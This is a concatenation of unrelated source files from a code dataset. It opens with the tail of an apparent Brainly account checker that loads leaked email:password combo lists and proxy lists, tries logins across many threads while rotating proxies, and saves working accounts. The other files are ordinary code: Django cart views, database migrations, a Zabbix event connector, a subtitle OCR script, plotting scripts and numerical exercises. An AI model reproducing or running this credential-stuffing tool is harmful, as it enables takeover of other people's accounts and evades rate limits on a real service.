open('./results/BRAINLY-{}.txt'.format(self.date), 'a')\n\n def load_proxies(self, proxies_path, p_type):\n if p_type == 'http/s' or p_type == '1':\n file = open(proxies_path, 'r').readlines()\n file = [pr.rstrip() for pr in file]\n for lines in file:\n data = lines.replace('\\n', '')\n self.proxies.append({'proxy':{'http': 'http://'+data,\n 'https': 'http://'+data}})\n \n elif p_type == 'socks4' or p_type == '2':\n file = open(proxies_path, 'r').readlines()\n file = [pr.rstrip() for pr in file]\n for lines in file:\n data = lines.replace('\\n', '')\n self.proxies.append({'proxy':{'http': 'socks4://'+data,\n 'https':'socks4://'+data}})\n \n elif p_type == 'socks5' or p_type == '3':\n file = open(proxies_path, 'r').readlines()\n file = [pr.rstrip() for pr in file]\n for lines in file:\n data = lines.replace('\\n', '')\n self.proxies.append({'proxy':{'http': 'socks5://'+data,\n 'https': 'socks5://'+data}})\n \n else: self.proxies.append({'proxy':None})\n\n def load(self, base_path):\n file = open(base_path, 'r', encoding='latin-1').readlines()\n file = [combos.rstrip() for combos in file]\n for lines in file:\n data = lines.replace('\\n', '').split(':')\n try:\n data[1] += ''\n except IndexError:\n data.append('1')\n self.acc_array.append({'em': data[0],\n 'pw': data[1]})\n\n def write_info(self, info):\n logging.info('Новый аккаунт')\n self.filename.write(info)\n self.filename.flush()\n\n\n def login(self, acc, pr):\n email = acc['em']\n password = acc['pw']\n proxy = pr['proxy']\n result = brainly_api.check(email, password, proxy)\n if result != None:\n self.write_info(result)\n\n\n def main(self, threads):\n from multiprocessing.dummy import Pool\n self.load(base_path)\n 
self.load_proxies(proxies_path, p_type)\n self.threads = threads\n pool = Pool(self.threads)\n pool.starmap(self.login, zip(self.acc_array, itertools.cycle(self.proxies)))\n #for _ in pool.imap_unordered(self.login, self.acc_array):\n # pass\n\n\n\nif __name__ == '__main__':\n import time, os\n logging.info(info)\n while True:\n try:\n path = input('Выберите базу --> ')\n proxies_path = input('Выберите прокси --> ')\n p_type = input('Тип прокси(http/s, socks4, socks5) --> ')\n threads = int(input('Количество потоков --> '))\n base_path = os.path.abspath(r''.join(path.replace('\"', '').strip())).replace('\\\\', '/')\n proxies_path = os.path.abspath(r''.join(proxies_path.replace('\"', '').strip())).replace('\\\\', '/')\n start = time.time()\n Checker().main(threads)\n logging.info('Закончено за {} сек.\\n--------------------'.format(str(round(time.time() - start, 2))))\n except KeyboardInterrupt:\n logging.info('Остановлено')\n os._exit(1)\n #except:\n # logging.error('Что-то пошло не так')\n","sub_path":"Brainly/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"254518595","text":"\"\"\"\nMigration script to allow invalidation of job external output metadata temp files\n\"\"\"\nfrom __future__ import print_function\n\nimport logging\n\nfrom sqlalchemy import Boolean, Column, MetaData\n\nfrom galaxy.model.migrate.versions.util import add_column, drop_column\n\nlog = logging.getLogger(__name__)\nmetadata = MetaData()\n\n\ndef upgrade(migrate_engine):\n metadata.bind = migrate_engine\n print(__doc__)\n metadata.reflect()\n\n isvalid_column = Column(\"is_valid\", Boolean, default=True)\n add_column(isvalid_column, \"job_external_output_metadata\", metadata)\n\n\ndef downgrade(migrate_engine):\n metadata.bind = migrate_engine\n metadata.reflect()\n # SQLAlchemy Migrate has a bug when dropping a boolean column in SQLite\n if migrate_engine.name != 'sqlite':\n drop_column(\"is_valid\", \"job_external_output_metadata\", metadata)\n","sub_path":"lib/galaxy/model/migrate/versions/0129_job_external_output_metadata_validity.py","file_name":"0129_job_external_output_metadata_validity.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"637364390","text":"from django.shortcuts import render,redirect,get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom .cart import Cart\nfrom .forms import CartAddProductForm\nfrom shop.models import Product\n# Create your views here.\n\n\n@require_POST\ndef cart_add(request,product_id):\n cart=Cart(request)\n product=get_object_or_404(Product,id=product_id)\n product_form=CartAddProductForm(request.POST)\n if product_form.is_valid():\n cd=product_form.cleaned_data\n cart.add(product=product,\n quantity=cd['quantity'],\n update_quantity=cd['update'])\n if not cd['update']:\n return redirect('shop:product_list')\n return redirect('cart:cart_detail')\n\ndef cart_remove(request,product_id):\n cart=Cart(request)\n product=get_object_or_404(Product,id=product_id)\n cart.remove(product)\n return redirect('cart:cart_detail')\n\n\ndef cart_detail(request):\n cart=Cart(request)\n dicty={'name':\"yasser\"}\n for item in cart:\n item['update_quantity_form']=CartAddProductForm(\n initial={'quantity':item['quantity'],\n 'update':True}\n )\n return render(request,\n 'cart/cart_detail.html',\n {'cart':cart,'vi':dicty}\n 
)\n","sub_path":"gelectronics/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"438410686","text":"import outlineTestPen\nreload(outlineTestPen)\nfrom outlineTestPen import OutlineTestPen\n\noptions = {\n \"extremum_calculate_badness\": True,\n \"extremum_ignore_badness_below\": 2,\n \"smooth_connection_max_distance\": 4,\n \"fractional_ignore_point_zero\": True,\n \"collinear_vectors_max_distance\": 2,\n}\n\ndef run_test(font, glyphnames):\n for n in glyphnames:\n g = font[n]\n otp = OutlineTestPen(CurrentFont(), options)\n g.draw(otp)\n if otp.errors:\n if len(otp.errors) > 0:\n g.mark = (1, 0.65, 0.6, 1)\n #for e in otp.errors:\n # print e\n\nfont = CurrentFont()\nglyphnames = CurrentFont().keys()\nrun_test(font, glyphnames)\n","sub_path":"RedArrow.roboFontExt/lib/Mark glyphs with errors.py","file_name":"Mark glyphs with errors.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"627887813","text":"'''\r\nCreator :Krishnendu Maji\r\n progam to verfify the CMB data with theory\r\n'''\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef irradiance(f): #this fucntion calculates the Spectral Iiradiance of a Blackbody at 2.725K\r\n\th = 6.626 * 10**-34.0 #units Js\r\n\tc = 3.0*10**8.0 # units ms^-1\r\n\tkB = 1.38064852 * 10**-23.0 # S.I units\r\n\tT = 2.725\r\n\r\n\tvalue = (2.0*h*c*f**3.0)/((np.exp((h*c*f)/(kB*T))-1.0))*10**20 # unit MJy/sr\r\n\treturn value\r\n'''\r\nThis sections creates data poins for plotting Blackbody radiation of a Blackbody at 2.725K\r\n'''\r\nwavenumber = np.arange(2.20,22.20,0.01) # units cm^-1\r\nplt.xlabel(\"Wave Number 1/λ (in $cm^-$)\")\r\nplt.ylabel(\"Intenity B$_λ$ (in MJy/sr)\")\r\nI = irradiance(100*wavenumber)\r\n#here I have found the wave number corresponding to the maximum irradiance#\r\nmaxvalue = \"The peak value at (wave number) \"+str(wavenumber[np.where(I == np.amax(I))[0]])\r\nprint(maxvalue)\r\n\r\n\r\n'''\r\nThis section plots the data from NASA\r\n'''\r\n\r\nwavenumber_data = np.loadtxt(\"C:/Users/user/Desktop/nasa_data.txt\",dtype = 'float',comments = '#',delimiter = None,usecols = (0))\r\nIrradiance_data = np.loadtxt(\"C:/Users/user/Desktop/nasa_data.txt\",dtype = 'float',comments = '#',delimiter = None,usecols = (1))\r\n\r\nplt.scatter(wavenumber_data , Irradiance_data, color = 'red', label='NASA Data', s = 12.0)\r\nplt.plot(wavenumber, irradiance(100.0*wavenumber),label='Planck\\'s Law at T = 2.725K', color = 'green')\r\nplt.legend(loc = 'upper right', frameon = True, shadow = True)\r\nplt.title(\"Comparing CMB background flux with Blackbody of temperature 2.725K\")\r\nplt.text(12.5,200,maxvalue)\r\nplt.grid(True)\r\nplt.show()\r\n#So, from the graph we see that the maximum of the graph occurs for the wavenumber 5.34 cm-1. So the corresponding wavelength is 0.1872 cm. This lies in the microwave region#\r\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"444908100","text":"# -*- coding: utf-8 -*-\n# \nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\ndef set_default_html(apps, schema_editor):\n plans_html = \"\"\"

Welcome to Trunk-Player\nCurrently no plans are setup

\n \"\"\"\n\n WebHTML = apps.get_model('radio', 'WebHtml')\n index = WebHTML(name='plans', bodytext=plans_html).save()\n\ndef remove_default_html(apps, schema_editor):\n WebHTML = apps.get_model('radio', 'WebHtml')\n WebHTML.objects.filter(name='plans').delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('radio', '0036_auto_20170522_1921'),\n ]\n\n operations = [\n # Setup a default source\n migrations.RunPython(set_default_html, remove_default_html),\n ]\n","sub_path":"radio/migrations/0037_add_default_plan_html.py","file_name":"0037_add_default_plan_html.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"223664058","text":"import glob\nimport sys\nimport numpy as np\nimport pickle\nfrom shared import scenes\n\n\n\nlabels = [i.split('/')[-1] for i in glob.glob(\"../output/images/*\")]\n\nsummary = []\nfor scene in scenes:\n for label in labels:\n files = glob.glob(\"../output/images/{}/*{}*.png\".format(label,scene))\n summary.append([scene, label, len(files)])\n\n\nsummary = sorted(summary, key=lambda x:x[2])\n\n\nif sys.argv[1] == \"SET\":\n starting_dict = {}\n\n for identifier in summary:\n key = identifier[0] + identifier[1]\n print(key)\n starting_dict[key] = identifier[2]\n #print(\"{}\\t{}\\t{}\".format(*identifier))\n\n with open('.tmp','w') as F:\n pickle.dump(starting_dict, F)\n\nelse:\n with open(\".tmp\",'r') as F:\n starting_dict = pickle.load(F)\n\n for identifier in summary:\n key = identifier[0] + identifier[1]\n count = identifier[2] - starting_dict[key]\n if count > 0:\n print(\"{0:14}{1:6}{2:10}\".format(identifier[0], identifier[1], count))\n\n\n","sub_path":"processing/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56690286","text":"import os\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\nclass Player:\n def __init__(self):\n self.location = None\n self.evidences = []\n self.alive = True\n self.credibility = 100\n self.penalty = -20\n self.showCred = False\n self.skip = False\n self.coins = 0\n self.props = []\n def goDirection(self, direction):\n self.location = self.location.getDestination(direction)\n def pickup(self, evid):\n self.evidences.append(evid)\n evid.loc = self\n self.location.removeEvidence(evid)\n return evid\n def showInventory(self):\n clear()\n print('You have ' + str(self.coins) + ' coins.\\n')\n print(\"You currently have these evidences:\")\n j = 1\n for e in self.evidences:\n print(str(j)+\".\", e.name)\n j += 1\n print()\n print('You have the following props:')\n j = 1\n for p in self.props:\n print(str(j) + \". \", p.name)\n print()\n input(\"press enter to continue...\")\n def consume(self, n):\n self.props[n-1].ability(self)\n\n\nclass Shop:\n def __init__(self, player):\n self.merchandise = [CP]\n self.player = player\n def purchase(self, n):\n clear()\n merch = self.merchandise[n-1]\n if self.player.coins >= merch.COST:\n if len(self.player.props) < 10:\n print('You\\'ve just purchased ' + merch.NAME + '! Cost ' + str(merch.COST) + 'coins!')\n self.player.props.append(merch())\n self.player.coins -= merch.COST\n else:\n print('Not enough bag space.')\n else:\n print('Not enough coins')\n input('press enter to continue...')\n def shopping(self):\n shopSucceed = False\n while not shopSucceed:\n clear()\n print(\"Welcome to the Shop! 
Purchase anything to your advance:\")\n i = 1\n for m in self.merchandise:\n print(str(i) + '. ' + m.NAME + ' ' + '.'*(40-len(m.NAME)) + str(m.COST) + ' coins')\n i += 1\n print()\n choice = input('What do you want to buy? ')\n if choice.isnumeric():\n n = int(choice)\n if n > 0 and n <= len(self.merchandise):\n self.purchase(n)\n print('Purchase Successful!')\n else:\n print('Invalid item!')\n elif choice == 'exit':\n shopSucceed = True\n elif choice == 'help':\n self.print_help()\n else:\n print('Invalid Command!')\n def print_help(self):\n clear()\n print('input to purchase item.')\n print('input \\'exit\\' to leave the shop')\n input('press enter to continue...')\n\nclass Prop:\n def __init__(self, name, cost):\n self.name = name\n self.cost = cost\n def ability(self, p):\n print(\"This prop can't do anything!\")\n\nclass CP(Prop):\n NAME = \"Evidence in a Box\"\n COST = 10\n def __init__(self):\n Prop.__init__(self, CP.NAME, CP.COST)\n\n def ability(self, player):\n player.credibility = min(100, player.credibility + 10)\n clear()\n print(\"Credibility up 10 percent.\")\n input('press enter to continue...')\n","sub_path":"PRFinal/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617866610","text":"#!/usr/bin/env python\n# -*- coding: iso-8859-1 -*-\n__author__=\"Marco Mina\"\n__email__=\"marco.mina.85@gmail.com\"\n\nimport sys\nimport os\nfrom Parser import *\n\nclass RowParser(Parser): # rename to StringParser?\n\tsplit = False\n\tseparator_symbol = '\\t'\n\tcomment_symbol = None\n\texpected_columns = 0\n\tmax_splits = None\n\n\tdef __init__(self):\n\t\tsuper(RowParser, self).__init__()\n\t\tpass\n\n\tdef is_ok(self, line):\n\t\tif line == '':\n\t\t\treturn False\n\t\tif not self.comment_symbol == None and line[0] == self.comment_symbol:\n\t\t\treturn False\n\t\treturn True\n\n\tdef process_line(self, line):\n\t\tif self.split:\n\t\t\tif self.max_splits == None:\n\t\t\t\tline = line.split(self.separator_symbol)\n\t\t\telse:\n\t\t\t\tline = line.split(self.separator_symbol, self.max_splits)\n\t\t\tif len(line) < self.expected_columns:\n\t\t\t\treturn\n\t\t\tself.output_data = line\n\t\telse:\n\t\t\tself.output_data = line\n\t\treturn\n\n\tdef finalize_output(self):\n\t\tpass\n\t\n\tdef initialize_output(self):\n\t\tself.output_data = None\n\n\tdef parse(self):\n\t\tself.initialize_output()\n\t\t#print \"This \" + self.input_data\n\t\tif self.input_data == None:\n\t\t\treturn\n\t\tif not type(self.input_data) == str:\n\t\t\treturn\n\t\tline = self.input_data.rstrip('\\n')\n\t\tline = line.rstrip('\\r')\n\t\tif not self.is_ok(line):\n\t\t\t#print \"Not ok\"\n\t\t\treturn\n\t\t#print \"ok\" + line\n\t\tself.process_line(line)\n\t\tself.finalize_output()\n","sub_path":"align/local_alignment/bin/pyAlignmentGraph-1.2/src/parser/RowParser.py","file_name":"RowParser.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"19848277","text":"#!/usr/bin/env python3\n# =============================================================================\n#\n# PUBLIC DOMAIN NOTICE\n# National Center for Biotechnology Information\n#\n# This software/database is a \"United States Government Work\" under the\n# terms of the United States Copyright Act. It was written as part of\n# the author's official duties as a United States Government employee and\n# thus cannot be copyrighted. 
This software/database is freely available\n# to the public for use. The National Library of Medicine and the U.S.\n# Government have not placed any restriction on its use or reproduction.\n#\n# Although all reasonable efforts have been taken to ensure the accuracy\n# and reliability of the software and data, the NLM and the U.S.\n# Government do not and cannot warrant the performance or results that\n# may be obtained by using this software or data. The NLM and the U.S.\n# Government disclaim all warranties, express or implied, including\n# warranties of performance, merchantability or fitness for any particular\n# purpose.\n#\n# Please cite the author in any work or product based on this material.\n#\n# =============================================================================\n\n\nimport connexion\nimport logging\nimport os\nimport sys\nfrom flask import render_template\n\nsys.path.append(\"/var/www/wsgi-scripts/\")\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nf_handler = logging.FileHandler(\"/tmp/drs_app.log\")\nf_handler.setLevel(logging.DEBUG)\nf_format = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nf_handler.setFormatter(f_format)\nlogger.addHandler(f_handler)\n\nif \"NCBI_LOGGER\" in os.environ:\n from ncbi import logger\n\n logger.addHandler()\n\n\nlogger.info(f\"logging started: {__name__}\")\n# logging.basicConfig(level=logging.INFO)\n\n# Create the application instance\noptions = {\n \"serve_spec\": False, # Don't show spec JSON\n \"swagger_ui\": False,\n} # Don't show swagger console\n\nos.environ[\"APIKEYINFO_FUNC\"] = \"ga4gh.drs.server.apikey_auth\"\n\napp = connexion.App(__name__, options=options, specification_dir=\"./openapi\")\n\n# Read the swagger.yml file to configure the endpoints\n# TODO: validate=True\napp.add_api(\"data_repository_service.swagger.yaml\", strict_validation=True)\n\napplication = app.app\n\n\n# Create a URL route in our application for \"/\"\n@app.route(\"/\")\ndef home():\n \"\"\"\n This function just responds to the browser URL\n localhost:5000/\n :return: the rendered template 'home.html'\n \"\"\"\n username = \"Apache\" # getpass.getuser()\n logger.info(f\"Got {username}\")\n logger.info(f\"headers is {connexion.request.headers}\")\n logger.info(f\"params is {connexion.request.json}\")\n logger.info(f\"query is {connexion.request.args}\")\n # connexion.request.method\n return render_template(\"home.html\", title=\"DRS\", username=username)\n\n\n# --------------------- proxy\nfrom ga4gh.drs.proxy import do_proxy\n\n\n@app.route(\"/proxy/\")\ndef proxy(shortID):\n return do_proxy(shortID)\n\n\n# ---------------------\n\n# If we're running in stand alone mode, run the application\nif __name__ == \"__main__\":\n logger.info(\"in main\")\n app.run(port=20814, debug=True)\n","sub_path":"files/var/www/wsgi-scripts/drs.py","file_name":"drs.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"3758326","text":"import json\nimport requests\nimport configparser\nimport arrow\nfrom urllib.parse import urlparse\n\n\nclass ZabbixApi(object):\n def __init__(self, configfile):\n self.config = configparser.ConfigParser()\n self.config.read(configfile)\n try:\n self.config.get(\"defaults\", \"zbxver\")\n self.zbxver = self.config.get(\"defaults\", \"zbxver\")\n self.zbxusr = self.config.get(\"defaults\", \"zbxusr\")\n self.zbxpwd = self.config.get(\"defaults\", \"zbxpwd\")\n self.zbxurl = 
self.config.get(\"defaults\", \"zbxurl\")\n self.conector = self.config.get(\"canopsis\", \"connector\")\n self.conectorname = self.config.get(\"canopsis\", \"connector_name\")\n except configparser.NoSectionError and configparser.NoOptionError:\n print(\"Config File error !\")\n exit(1)\n parsedurl = urlparse(self.zbxurl)\n self.component = parsedurl.netloc.replace(\".\", \"-\")\n jauth = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n \"user\": self.zbxusr,\n \"password\": self.zbxpwd\n },\n \"id\": 1\n }\n httptoken = requests.post(self.zbxurl, json=jauth)\n if httptoken.status_code != 404:\n authkey = httptoken.json()\n else:\n print(\"url not found - http status {}\".format(httptoken.status_code))\n exit(1)\n self.zbxtoken = authkey[\"result\"]\n self.zbxid = authkey[\"id\"]\n\n def ZbxGetItem(self, triggerid):\n itemdict = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"item.get\",\n \"params\": {\n \"output\": \"extend\",\n \"triggerids\": triggerid\n },\n \"auth\": self.zbxtoken,\n \"id\": self.zbxid\n }\n httpresp = requests.post(self.zbxurl, json=itemdict)\n itemjson = httpresp.json()\n try:\n zbxitem = itemjson[\"result\"][0][\"name\"]\n except IndexError:\n zbxitem = None\n return zbxitem\n\n def ZbxLastEvent(self):\n curts = arrow.now().shift().timestamp\n ltsts = arrow.now().shift(minutes=-1).timestamp\n jevent = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"trigger.get\",\n \"params\": {\n \"output\": \"extend\",\n \"selectHosts\": \"\",\n \"lastChangeSince\": ltsts,\n \"lastChangeTill\": curts\n },\n \"auth\": self.zbxtoken,\n \"id\": self.zbxid\n }\n #print(json.dumps(jevent,indent=4))\n httpevent = requests.post(self.zbxurl, json=jevent)\n httpevent = httpevent.json()\n return httpevent[\"result\"]\n\n def ZbxGetHost(self, hostid):\n hostdict = {}\n jhost = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"host.get\",\n \"output\": [\n \"hostid\",\n \"host\"\n ],\n \"params\": {\n \"hostids\": hostid,\n \"selectInterfaces\": [\n \"ip\"\n ]\n },\n \"auth\": self.zbxtoken,\n \"id\": self.zbxid\n }\n #print(json.dumps(jhost))\n hostreq = requests.post(self.zbxurl, json=jhost)\n jresp = hostreq.json()\n #print(json.dumps(jresp, indent=4))\n hostdict[\"name\"] = jresp[\"result\"][0][\"host\"]\n hostdict[\"ip\"] = jresp[\"result\"][0][\"interfaces\"][0][\"ip\"]\n return hostdict\n\n def ZbxHostEvent(self):\n resultlst = self.ZbxLastEvent()\n event = []\n for item in resultlst:\n hostid = item[\"hosts\"][0][\"hostid\"]\n hostvalue = item[\"value\"]\n hostdescrp = item[\"description\"]\n hostdict = self.ZbxGetHost(hostid)\n hostname = hostdict[\"name\"]\n hostip = hostdict[\"ip\"]\n resource = self.ZbxGetItem(item[\"triggerid\"])\n hostevent = {\n \"connector\": self.conector,\n \"connector_name\": self.conectorname,\n \"event_type\": \"check\",\n \"source_type\": \"resource\",\n \"component\": hostname,\n \"resource\": resource,\n \"address\": hostip,\n \"output\": hostdescrp,\n \"state\": hostvalue,\n \"timestamp\": arrow.now().shift().timestamp\n }\n event.append(hostevent)\n return event\n\n def __call__(self, *args, **kwargs):\n return self.ZbxHostEvent()","sub_path":"lib/zabbix2canopsis.py","file_name":"zabbix2canopsis.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"25823740","text":"'''\nDescription:\nAuthor: Hejun Jiang\nDate: 2020-11-19 14:54:17\nLastEditTime: 2020-11-23 15:02:30\nLastEditors: Hejun Jiang\nVersion: v0.0.1\nContact: 
jianghejun@hccl.ioa.ac.cn\nCorporation: hccl\n'''\n# -*- coding: utf-8 -*-\nimport os\nimport time\nimport cv2 # BGR\nimport shutil\nimport numpy as np\nfrom config import *\nfrom PIL import Image # RGB\nfrom model import text_predict, crnn_handle\nfrom difflib import SequenceMatcher\nfrom apphelper.image import base64_to_PIL\n\n\ndef strdiff(str1, str2):\n return SequenceMatcher(None, str1, str2).ratio()\n\n\ndef conut_chinese(strs):\n n = 0\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n n += 1\n if n >= SubMinLen:\n return True\n return False\n\n\ndef GetSubImg(img):\n hight = img.shape[0]\n width = img.shape[1]\n subtitleimg = img[int(\n hight * SubUpRatio): int(hight * SubBottomRatio), int(\n width * SubLeftRatio): int(width * SubRightRatio)]\n return subtitleimg\n\n\ndef GetSrtFromVideo(VideoDir, JumpFrame=0, isSaveImg=False):\n dirname = os.path.dirname(VideoDir)\n basename = os.path.basename(VideoDir)\n video = cv2.VideoCapture(VideoDir)\n fps = video.get(cv2.CAP_PROP_FPS) # fps\n framenum = video.get(cv2.CAP_PROP_FRAME_COUNT) # frame number\n totaltime = framenum / fps # video length, s\n srtpath = os.path.join(\n dirname, basename.split('.')[0] + '.srt')\n saveimgdir = os.path.join(\n dirname, basename.split('.')[0])\n if os.path.exists(srtpath):\n os.remove(srtpath)\n if os.path.isdir(saveimgdir):\n shutil.rmtree(saveimgdir)\n os.makedirs(saveimgdir)\n print('video path:', VideoDir)\n print('srt path:', srtpath)\n print('total frame num:%d,' % framenum, 'fps:%d' %\n fps, 'timeLen:%.2fs' % totaltime)\n\n idx = 0\n result = []\n while True:\n success, img = video.read()\n milltime = video.get(cv2.CAP_PROP_POS_MSEC)\n if not success:\n break\n idx += 1\n if idx % (JumpFrame + 1) != 0:\n continue\n subimg = GetSubImg(img)\n text = crnn_handle.predict(Image.fromarray(\n subimg).convert(\"RGB\").convert('L')) # 识别的文本\n result.append([text, milltime])\n print('text:', text)\n print('get results done, result length:', len(result))\n\n # f = open('./temp.txt', 'w', encoding='utf-8')\n # for item in result:\n # f.write(item[0] + ' || ' + str(item[1]) + '\\n')\n # f.close()\n\n # f = open('./temp.txt', 'r', encoding='utf-8')\n # lis = f.readlines()\n # f.close()\n # result = []\n # for line in lis:\n # l = line.split(' || ')\n # result.append([l[0], float(l[1])])\n\n i = 0 # result的开始\n idx = 1\n while True:\n if i >= len(result):\n break\n if conut_chinese(result[i][0]):\n start = result[i]\n print('start:', start)\n # 从start idx开始之后的SubMaxTime秒,包括start idx在内的SubMaxTime秒张图\n rlist = list(reversed(result[i: int(SubMaxTime * fps + i)]))\n\n for j, ritem in enumerate(rlist):\n if conut_chinese(ritem[0]) and strdiff(ritem[0], start[0]) >= SimilarThreshold:\n end = ritem\n fakei = i + (len(rlist) - j - 1)\n if result[fakei][1] - result[i][1] >= DiffTime*1000:\n fp = open(srtpath, 'a+', encoding='gb2312') # chinese\n fp.write(str(idx) + '\\n')\n fp.write(time.strftime(\"%H:%M:%S\", time.localtime(start[1]/1000)) + ',' + str(int(start[1] % 1000)) +\n ' --> ' + time.strftime(\"%H:%M:%S\", time.localtime(end[1]/1000)) + ',' + str(int(end[1] % 1000)) + '\\n')\n fp.write(start[0] + '\\n\\n')\n fp.close()\n idx += 1\n i = fakei # 满足条件,比较长时间\n break # 匹配完成一次就退出\n i += 1\n\n\ndef videosDetect():\n '''for videos detect'''\n vtype = ['mp4', 'mkv']\n t = time.time()\n videosdir = './test_videos/'\n for dirpath, dirname, dirfile in os.walk(videosdir):\n for file in dirfile:\n if file.split('.')[-1] in vtype:\n GetSrtFromVideo(VideoDir=os.path.join(\n dirpath, file), JumpFrame=1, 
isSaveImg=True)\n print('total spend time:%d s\\n' % (time.time() - t))\n\n\ndef imagesDetect():\n '''for images detect'''\n imgtype = ['png', 'jpg', 'jpeg']\n t = time.time()\n imgdir = './test_imgs/'\n for dirpath, dirname, dirfile in os.walk(imgdir):\n for file in dirfile:\n if file.split('.')[-1] in imgtype:\n t = time.time()\n fp = open(os.path.join(\n dirpath, file.split('.')[0] + '.txt'), 'w', encoding='utf-8')\n filepath = os.path.join(dirpath, file)\n print(filepath, ':')\n fp.write(filepath + ':\\n')\n img = np.array(Image.open(filepath).convert('RGB'))\n result = text_predict(img)\n text = ' '.join([i['text'] for i in result])\n print('text:', text)\n for n, dic in enumerate(result):\n fp.write('line%d:' % n + str(dic) + '\\n')\n timeTake = time.time() - t\n print('recog spend time:%d s' % timeTake)\n fp.write('recog spend time:%d s' % timeTake + '\\n')\n fp.close()\n print('total spend time:%d s\\n' % (time.time() - t))\n\n\nif __name__ == '__main__':\n videosDetect()\n # imagesDetect()\n","sub_path":"GetSrt.py","file_name":"GetSrt.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"194566796","text":"\"\"\"\nCreate data to study overfitting\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\n\nfile_name = 'noisy_data.csv'\n\ninputs = np.random.uniform(-100, 100, 100)\n# print(x)\n# create data with random noise\noutputs = [(0.2*(x-40))**3+(x-40)**2 + 500 * np.random.rand() for x in inputs]\n\n\nwith open(file_name, 'w') as csvfile:\n filewriter = csv.writer(csvfile, delimiter=',')\n for point in range(len(inputs)):\n filewriter.writerow([inputs[point], outputs[point]])\n\n\ntitle = 'Noisy data'\nfile = 'data_to_fit.pdf'\nplt.plot(inputs, outputs, 'o')\nplt.xlabel('input')\nplt.ylabel('output')\nplt.title(title)\nplt.savefig('images/' + file)\n","sub_path":"code/overfitting/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"451325960","text":"# -*- coding: utf-8 -*-\n#NÃO APAGUE A LINHA ACIMA. COMECE ABAIXO DESTA LINHA\n#ENTRADA\nn = int(input('Digite o valor de n: '))\nnum = 2\nden = 1\ncont = 1\nmult = 1\n#PROCESSAMENTO\nwhile (cont<=n) :\n mult = mult*(num/den)\n if (num/den) > 1 :\n den = den+2\n elif (num/den) < 1 :\n num = num+2\n cont = cont+1\npi = mult*2\nprint('O valor de pi é %.5f : ' % pi)\n","sub_path":"moodledata/vpl_data/195/usersdata/271/74585/submittedfiles/al10.py","file_name":"al10.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422730065","text":"# g(x) = x^2 +x-4. 
# Suppose there is a small error, h, in the value of x.\ndef g_abs_err(x, h):\n    \"\"\"Returns the absolute error of computing `g` at `x` if `x` is\n    perturbed by a small value `h`.\n    \"\"\"\n\n    return abs(-h ** 2 - 2 * x * h - h)\n\n\ndef g_rel_err(x, h):\n    \"\"\"Returns the relative error of computing `g` at `x` if `x` is\n    perturbed by a small value `h`.\n    \"\"\"\n    abs_error = g_abs_err(x, h)\n    return abs_error / (x ** 2 + x - 4)\n\n\n# g(x) = x^2 +x+c\ndef g_root_abs_err(c, h):\n    \"\"\"Returns the absolute error of finding the (most) positive root of `g` when\n    `c` is perturbed by a small value `h`.\n    \"\"\"\n\n    return abs(-np.sqrt(1 - 4 * c) + np.sqrt(1 - 4 * c - 4 * h)) / 2\n\n\ndef g_root_rel_err(c, h):\n    \"\"\"Returns the relative error of finding the (most) positive root of `g` when\n    `c` is perturbed by a small value `h`.\n    \"\"\"\n    abs_err = g_root_abs_err(c, h)\n    actual = -(-1 + np.sqrt(1 - 4 * c)) / 2\n    return abs_err / actual\n\n\n# q2 start----------------------------------------------------------------------\n# q2 start----------------------------------------------------------------------\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\n\n\ndef f(x):\n    return (x - math.sin(x)) / math.pow(x, 3)\n\n\ndef plot_f():\n    xs = [x for x in np.arange(-3.0, 3.0, 0.05) if abs(x) > 0.05]\n    ys = [f(x) for x in xs]\n    plt.plot(xs, 